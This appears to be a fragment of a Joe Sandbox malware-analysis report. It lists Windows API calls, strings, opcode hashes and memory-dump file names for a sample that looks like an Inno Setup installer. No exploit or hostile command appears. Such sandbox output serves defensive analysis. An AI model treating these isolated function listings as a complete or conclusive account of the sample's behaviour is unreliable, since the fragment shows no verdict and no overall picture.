                                                                                    • API String ID: 1959240892-1126107055
                                                                                    • Opcode ID: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
                                                                                    • Instruction ID: ec4a18813bd70517abb30b2059a031d9bbc12b7253ca3772a6f1eb51880190fd
                                                                                    • Opcode Fuzzy Hash: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
                                                                                    • Instruction Fuzzy Hash: 42015B75A04708BFD705CF6ADC1195ABBE9E78A720B22C87BEC04D36A0EB345814DE18
                                                                                    APIs
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047B346,00000000,0047B35C,?,?,?,?,00000000), ref: 0047B122
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID: RegisteredOrganization$RegisteredOwner
                                                                                    • API String ID: 3535843008-1113070880
                                                                                    • Opcode ID: e77b6468a0bbf668d644fb693f5a97652e08946f06f09772adc7615d771fa624
                                                                                    • Instruction ID: c0e5db093c22981a2c4b78a2736f8ddfc80e316131ebabe5fbae1d79ea558dad
                                                                                    • Opcode Fuzzy Hash: e77b6468a0bbf668d644fb693f5a97652e08946f06f09772adc7615d771fa624
                                                                                    • Instruction Fuzzy Hash: F1F0BB70708284ABEB00D675FD92BDB3359D742344F50807BA5149B391D7B99E01D79C
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474403), ref: 004741F1
                                                                                    • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474403), ref: 00474208
                                                                                      • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateErrorFileHandleLast
                                                                                    • String ID: CreateFile
                                                                                    • API String ID: 2528220319-823142352
                                                                                    • Opcode ID: 285fe29be3b45c5d55921f03afc8078dc8cb5333e8f17a8fd5c0d1f978e05295
                                                                                    • Instruction ID: 58c46c97337ee3450255063b4db4f116026cd25e8145783c5652bdd163bde5c5
                                                                                    • Opcode Fuzzy Hash: 285fe29be3b45c5d55921f03afc8078dc8cb5333e8f17a8fd5c0d1f978e05295
                                                                                    • Instruction Fuzzy Hash: 78E06D342803447FEA10F769DCC6F5A7788AB04768F108152FA58AF3E3C6B9EC408618
                                                                                    APIs
                                                                                      • Part of subcall function 0045623C: CoInitialize.OLE32(00000000), ref: 00456242
                                                                                      • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                      • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                                    • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004562D0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                    • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                    • API String ID: 2906209438-2320870614
                                                                                    • Opcode ID: 5f0321f70bc8b65a0e9df3b83bb4349998e588e00924faa4de34c024f66de19b
                                                                                    • Instruction ID: 517aaa95fd919f42fec07b3e20ba2fe3b86c01757d5d2d7eeafb2f6c84d6a724
                                                                                    • Opcode Fuzzy Hash: 5f0321f70bc8b65a0e9df3b83bb4349998e588e00924faa4de34c024f66de19b
                                                                                    • Instruction Fuzzy Hash: 4CC040D074455095CA0077FB540374F14149750717F5180BFB848675C7DF3D440D566E
                                                                                    APIs
                                                                                      • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                      • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                                    • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BE39
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressErrorLibraryLoadModeProc
                                                                                    • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                    • API String ID: 2492108670-2683653824
                                                                                    • Opcode ID: b0d4ed7fe2e6c92240e78bd32e692da4caac8c34d98bb73dc912627f5a414994
                                                                                    • Instruction ID: f15142af1028fbda52646c9d138091dcd6bfc2c127db856ea005f68399f83491
                                                                                    • Opcode Fuzzy Hash: b0d4ed7fe2e6c92240e78bd32e692da4caac8c34d98bb73dc912627f5a414994
                                                                                    • Instruction Fuzzy Hash: 76B092A0B00780C6CE00BBB3A8127871528D740704B10C07F7240EA696FF7E8C458FEE
                                                                                    APIs
                                                                                    • GetSystemMenu.USER32(00000000,00000000,00000000,00480368), ref: 00480300
                                                                                    • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00480311
                                                                                    • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00480329
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Append$System
                                                                                    • String ID:
                                                                                    • API String ID: 1489644407-0
                                                                                    • Opcode ID: 07804b108b7a0fe67ba00d28aa87a6db0bb0739bb6f9f414250e392156e0bb43
                                                                                    • Instruction ID: 04a05a6f5988e1ad1c69e12ed442e821a58669dfeb252773ef60a283987a992a
                                                                                    • Opcode Fuzzy Hash: 07804b108b7a0fe67ba00d28aa87a6db0bb0739bb6f9f414250e392156e0bb43
                                                                                    • Instruction Fuzzy Hash: 3431B0707043441BD721FB769C8AB9E3A949B1531CF5408BBF800AA3D3CABC9C09879D
                                                                                    APIs
                                                                                    • 73A0A570.USER32(00000000,?,00000000,00000000,0044ACE1,?,00480B97,?,?), ref: 0044AC55
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0044AC78
                                                                                    • 73A0A480.USER32(00000000,?,0044ACB8,00000000,0044ACB1,?,00000000,?,00000000,00000000,0044ACE1,?,00480B97,?,?), ref: 0044ACAB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: A480A570ObjectSelect
                                                                                    • String ID:
                                                                                    • API String ID: 1230475511-0
                                                                                    • Opcode ID: ce16d757fc6e84d8b50fecd4ea510c6835f5a6497dcb8cdd06a43cc5d170f4e8
                                                                                    • Instruction ID: 3b5f26ead791ea6387a249f2cdaddc54e41ca9264cf2fbaff888b01415335cc3
                                                                                    • Opcode Fuzzy Hash: ce16d757fc6e84d8b50fecd4ea510c6835f5a6497dcb8cdd06a43cc5d170f4e8
                                                                                    • Instruction Fuzzy Hash: CA21B670E44248AFEB01DFA5C885B9F7BB9EB48304F41807AF500E7281D77C9950CB6A
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044A9A0,?,00480B97,?,?), ref: 0044A972
                                                                                    • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044A985
                                                                                    • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044A9B9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: DrawText$ByteCharMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 65125430-0
                                                                                    • Opcode ID: ba67a2f4d1841ae75712bddd7de105be3c5bdedf26297cf57516476b8703cb91
                                                                                    • Instruction ID: 8b0288b9d3461177b0e2011e4a6e3c0ecae8d00baf86e8e824f1a66b6306016d
                                                                                    • Opcode Fuzzy Hash: ba67a2f4d1841ae75712bddd7de105be3c5bdedf26297cf57516476b8703cb91
                                                                                    • Instruction Fuzzy Hash: 0E11B6B27446047FEB10DAAA9C82E6FB7ECEB49724F10417BF504E7290D6389E018669
                                                                                    APIs
                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424422
                                                                                    • TranslateMessage.USER32(?), ref: 0042449F
                                                                                    • DispatchMessageA.USER32(?), ref: 004244A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DispatchPeekTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 4217535847-0
                                                                                    • Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                                    • Instruction ID: 520fb342982be2dd3794930026bb259c1cd38a4fe19eb968f01b3c53081bdda3
                                                                                    • Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                                    • Instruction Fuzzy Hash: 781191307043205AEE20FA64AD41B9B73D4DFD1708F80481EF9D997382D77D9E49879A
                                                                                    APIs
                                                                                    • SetPropA.USER32(00000000,00000000), ref: 0041667A
                                                                                    • SetPropA.USER32(00000000,00000000), ref: 0041668F
                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Prop$Window
                                                                                    • String ID:
                                                                                    • API String ID: 3363284559-0
                                                                                    • Opcode ID: 51d1e881393928d894513cc5a6715d0f9133524890ebfc277249263b82eead75
                                                                                    • Instruction ID: 52b24e3238e4314aade48f96f4600562d70e15a3c995b5dbeb32d15e299d8853
                                                                                    • Opcode Fuzzy Hash: 51d1e881393928d894513cc5a6715d0f9133524890ebfc277249263b82eead75
                                                                                    • Instruction Fuzzy Hash: 4CF0BD71701220ABEB10AB598C85FA632DCAB09715F16017ABE09EF286C678DC50C7A8
                                                                                    APIs
                                                                                    • IsWindowVisible.USER32(?), ref: 0041EE74
                                                                                    • IsWindowEnabled.USER32(?), ref: 0041EE7E
                                                                                    • EnableWindow.USER32(?,00000000), ref: 0041EEA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$EnableEnabledVisible
                                                                                    • String ID:
                                                                                    • API String ID: 3234591441-0
                                                                                    • Opcode ID: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
                                                                                    • Instruction ID: 4e94e345e4a8e87798afb8fb42df504bf5387c41ee1a2ac16dc0d48b177cce37
                                                                                    • Opcode Fuzzy Hash: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
                                                                                    • Instruction Fuzzy Hash: 4DE0EDB8100304AAE750AB2BEC81A57769CBB55314F49843BAC099B293DA3ED8449A78
                                                                                    APIs
                                                                                    • SetActiveWindow.USER32(?), ref: 00480C2A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ActiveWindow
                                                                                    • String ID: InitializeWizard
                                                                                    • API String ID: 2558294473-2356795471
                                                                                    • Opcode ID: 723738b8fbe3fabf7eb5c80f16a5b290c90bba58ac79f9736125b6795bdc7b1c
                                                                                    • Instruction ID: 7183a9f40d151cc4564f9c637f0f3a65215fdab84d47651bf6ef09736f3ca39c
                                                                                    • Opcode Fuzzy Hash: 723738b8fbe3fabf7eb5c80f16a5b290c90bba58ac79f9736125b6795bdc7b1c
                                                                                    • Instruction Fuzzy Hash: C511C1302142049FD754EB6AFD82B0A7BA8E716728F10447BE810C77A1EB79AC64C79D
                                                                                    APIs
                                                                                      • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047B222,00000000,0047B35C), ref: 0047B021
                                                                                    Strings
                                                                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047AFF1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpen
                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                    • API String ID: 47109696-1019749484
                                                                                    • Opcode ID: 3b78e152b17f15840806b4e47da0d6875f627c855d5fc6915719fd9d10737491
                                                                                    • Instruction ID: 32b1a4b4f3febb624688285ac2ab15cdeec5a734a0466c395ac52858640c886b
                                                                                    • Opcode Fuzzy Hash: 3b78e152b17f15840806b4e47da0d6875f627c855d5fc6915719fd9d10737491
                                                                                    • Instruction Fuzzy Hash: 7CF0E93170021467D700A55A6D02BAF528DCB80358F20407FF508EB342DABA9D06039C
                                                                                    APIs
                                                                                    • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00474FCB,0049B178,?,0046E183,?,00000000,0046E6DA,?,_is1), ref: 0046DE8F
                                                                                    Strings
                                                                                    • Inno Setup: Setup Version, xrefs: 0046DE8D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value
                                                                                    • String ID: Inno Setup: Setup Version
                                                                                    • API String ID: 3702945584-4166306022
                                                                                    • Opcode ID: 308a2d795db4d9f089db4d3a0d80863649b6fa39a5e40ce591918164ebf00fab
                                                                                    • Instruction ID: 3f565b73c41be68d18d1c675279a4c2ca8d62721aeaae2bfa6e8ff1167108c85
                                                                                    • Opcode Fuzzy Hash: 308a2d795db4d9f089db4d3a0d80863649b6fa39a5e40ce591918164ebf00fab
                                                                                    • Instruction Fuzzy Hash: 6AE06D717016043FD710AA2BDC85F6BBADCDF983A5F10403AB908EB392D578DD0081A8
                                                                                    APIs
                                                                                    • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046E544,?,?,00000000,0046E6DA,?,_is1,?), ref: 0046DEEF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value
                                                                                    • String ID: NoModify
                                                                                    • API String ID: 3702945584-1699962838
                                                                                    • Opcode ID: fcf48f294370718ea72f2974fc8c507718464dc9ad4e6ec171c14c9c323779b1
                                                                                    • Instruction ID: 16e32e904041cf2989cb5be4c2021f94977a521c7974260517dd4293f9cbe128
                                                                                    • Opcode Fuzzy Hash: fcf48f294370718ea72f2974fc8c507718464dc9ad4e6ec171c14c9c323779b1
                                                                                    • Instruction Fuzzy Hash: 64E04FB0A04304BFEB04EB55CD4AF6F77ACDB48754F104059BA089B291E674EE00C668
                                                                                    APIs
                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                    Strings
                                                                                    • System\CurrentControlSet\Control\Windows, xrefs: 0042DD5E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Open
                                                                                    • String ID: System\CurrentControlSet\Control\Windows
                                                                                    • API String ID: 71445658-1109719901
                                                                                    • Opcode ID: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
                                                                                    • Instruction ID: aea9d63627e202933d8ac4c6cad7c964b34c473e1f77024d29d81bfc1069fbec
                                                                                    • Opcode Fuzzy Hash: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
                                                                                    • Instruction Fuzzy Hash: 6FD09E72920128BB9B009A89DC41DF7775DDB19760F44401AF90497141C1B4AC5197E4
                                                                                    APIs
                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,0045386F,?,00000000,004538D9,?,?,-00000001,00000000,?,0047B861,00000000,0047B7B0,00000000), ref: 0045384B
                                                                                    • FindClose.KERNEL32(000000FF,00453876,0045386F,?,00000000,004538D9,?,?,-00000001,00000000,?,0047B861,00000000,0047B7B0,00000000,00000001), ref: 00453869
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileNext
                                                                                    • String ID:
                                                                                    • API String ID: 2066263336-0
                                                                                    • Opcode ID: ce33a9adc91091840db89c3f0b9d0ab62a3048a172c241aa17054621e5542f77
                                                                                    • Instruction ID: 9ec0e3c397c6f5708f2a232916c112a37fe27e538a562d44e8698fe4f4711445
                                                                                    • Opcode Fuzzy Hash: ce33a9adc91091840db89c3f0b9d0ab62a3048a172c241aa17054621e5542f77
                                                                                    • Instruction Fuzzy Hash: AA81B37090424D9FCF11EF65C8417EFBBB4AF4934AF1480AAE84067392D3399B4ACB58
                                                                                    APIs
